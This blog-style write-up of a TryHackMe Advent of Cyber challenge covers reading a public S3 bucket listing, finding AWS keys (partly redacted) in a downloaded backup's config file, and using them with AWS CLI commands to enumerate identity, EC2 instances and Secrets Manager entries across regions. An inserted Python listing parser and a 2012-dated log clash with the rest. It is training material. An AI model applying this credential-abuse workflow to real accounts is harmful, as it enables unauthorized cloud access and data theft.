AoC3#17: Elf Leaks CTF

With my recent Elf OSINT post written, it's time to tackle the Advent of Cyber's 17th day challenge – Elf Leaks. This one is all about accessing cloud data, namely in AWS.

This challenge starts with pages of good intel about cloud services, AWS, buckets, S3 and so much more.

With AWS buckets, it's important to know how to access them via the AWS CLI without any credentials. To do that, append --no-sign-request to the end of the command.

TryHackMe suggests some good AWS reconnaissance techniques:

Finding the Account ID belonging to an access key:

aws sts get-access-key-info --access-key-id AKIAEXAMPLE

Determining the username the access key you're using belongs to:

aws sts get-caller-identity --profile PROFILENAME

Listing all the EC2 instances running in an account:

aws ec2 describe-instances --output text --profile PROFILENAME

Listing all the EC2 instances running in an account in a different region:

aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME

AWS Buckets

Examining the suggested image in Firefox developer panel gives up the name of the bucket used to host the file, so that was nice and easy.

To grab the flag, I first wanted to see all the files available.

$ wget http://s3.amazonaws.com/images.bestfestivalcompany.com/

--2012-12-29 07:19:49--  http://s3.amazonaws.com/images.bestfestivalcompany.com/
Resolving s3.amazonaws.com (s3.amazonaws.com)... 52.217.204.248
Connecting to s3.amazonaws.com (s3.amazonaws.com)|52.217.204.248|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/xml]
Saving to: ‘index.html’

index.html                    [ <=>                                  ]   2.08K  --.-KB/s    in 0.003s

2012-12-29 07:19:49 (611 KB/s) - ‘index.html’ saved [2128]

This gave me an XML file (an S3 ListBucketResult document) listing every object in the bucket. I dumped the contents into Mousepad and ran a quick regex over it to pull out the object keys in a more readable form.
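As an added example (not the author's regex or any code from the original post), here is a small Python parser for the ListBucketResult XML that an unauthenticated bucket listing returns; the sample listing, bucket name and object keys are constructed, and the risky-pattern list is my own choice for flagging objects a bucket owner should never leave world-readable.

```python
import xml.etree.ElementTree as ET

# XML namespace used by S3 ListBucketResult documents.
S3_NS = {"s3": "http://s3.amazonaws.com/doc/2006-03-01/"}

# Constructed sample listing; the bucket name and keys are made up, not the CTF bucket's contents.
SAMPLE_LISTING = """<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>images.example-bucket.com</Name>
  <IsTruncated>false</IsTruncated>
  <Contents>
    <Key>2021/11/banner.png</Key>
    <LastModified>2021-11-23T10:15:00.000Z</LastModified>
    <Size>20480</Size>
  </Contents>
  <Contents>
    <Key>backups/site-backup.zip</Key>
    <LastModified>2021-11-24T01:02:03.000Z</LastModified>
    <Size>1048576</Size>
  </Contents>
  <Contents>
    <Key>wp-config.php</Key>
    <LastModified>2021-11-24T01:05:00.000Z</LastModified>
    <Size>3100</Size>
  </Contents>
</ListBucketResult>
"""

# Key fragments that usually mean a backup, archive or config file (assumed list, extend as needed).
RISKY_PATTERNS = (".zip", ".tar", ".gz", ".sql", ".bak", "config", ".env", ".pem")

def parse_listing(xml_text):
    """Return (bucket_name, objects, truncated) from a ListBucketResult document.
    objects is a list of dicts with key, size (int) and last_modified."""
    root = ET.fromstring(xml_text)
    name = root.findtext("s3:Name", namespaces=S3_NS)
    # A truncated listing means a follow-up request with a marker is needed to see the rest.
    truncated = root.findtext("s3:IsTruncated", namespaces=S3_NS) == "true"
    objects = []
    for item in root.findall("s3:Contents", S3_NS):
        objects.append({
            "key": item.findtext("s3:Key", namespaces=S3_NS),
            "size": int(item.findtext("s3:Size", namespaces=S3_NS)),
            "last_modified": item.findtext("s3:LastModified", namespaces=S3_NS),
        })
    return name, objects, truncated

def risky_keys(objects):
    """Keys whose name suggests a backup, archive or config file sitting in a public bucket."""
    return [o["key"] for o in objects if any(p in o["key"].lower() for p in RISKY_PATTERNS)]
```

Running the same parser over the real index.html that wget saved gives the per-object list the author produced with a regex, and risky_keys() is the check a bucket owner would run before making a bucket public.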

This listed the target file, which meant I could perform another simple curl request to grab the flag. (Visiting it in the browser would have worked equally well.)

Now that I had the list of all the files, the other file that looks interesting is easy to spot.

I grabbed that file using a standard curl command. After unzipping it, the first file I checked contained the solutions:


/* Add any custom values between this line and the "stop editing" line. */
define('S3_UPLOADS_BUCKET', 'images.best...company.com');
define('S3_UPLOADS_KEY', 'AKIAQI...CPZXFYAOI');
define('S3_UPLOADS_SECRET', 'Y+2fQBoJ...F5kWE0ZX03n/KcYxkS1Qmc');
define('S3_UPLOADS_REGION', 'us-east-1');  

To grab the username and access key, I downloaded the AWS CLI utility to my Kali box.

I had to run aws configure first, dropping in the stolen credentials listed above.

I then could run the following:

$ aws sts get-access-key-info --access-key-id AKIAQI...CPZXFYAOI

… and…

$ aws sts get-caller-identity

{
"UserId": "AIDAQI...3E73BO",
"Account": "019...476",
"Arn": "arn:aws:iam::0191...476:user/xxxx@bfc.com"
}

… and…

$ aws ec2 describe-instances

Those three commands threw up the answers to most of the CTF challenge questions.

To get the database password from the secrets manager took a bit of research and fiddling.

First off I requested all the secrets:

$ aws secretsmanager list-secrets

Then, after a lot of head scratching, I noticed that there are more secrets stored in different regions. Specifying --region xx-xx-xx gave up some more secrets.

I thought I’d found it, but when issuing the following command I received a great response:

$ aws secretsmanager get-secret-value --secret-id {secretname}

{
    "ARN": "arn:aws:secretsmanager:us-east-1:0191...476:secret:HR-Password-8AkWYF",
    "Name": "{secretname}",
    "VersionId": "70630b3c-...-18445bd808b1",
    "SecretString": "The Secret you're looking for is not in this **REGION**. Santa wants to have low latency to his databases. Look closer to where he lives.",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1637717347.718
}

After some more changes to the region, I finally grabbed the flag.

This CTF challenge day showed me a lot about the AWS bucket infrastructure and taught me a bunch of useful AWS CLI commands.

TryHackMe’s day 18 of Advent of Cyber has now been written up.
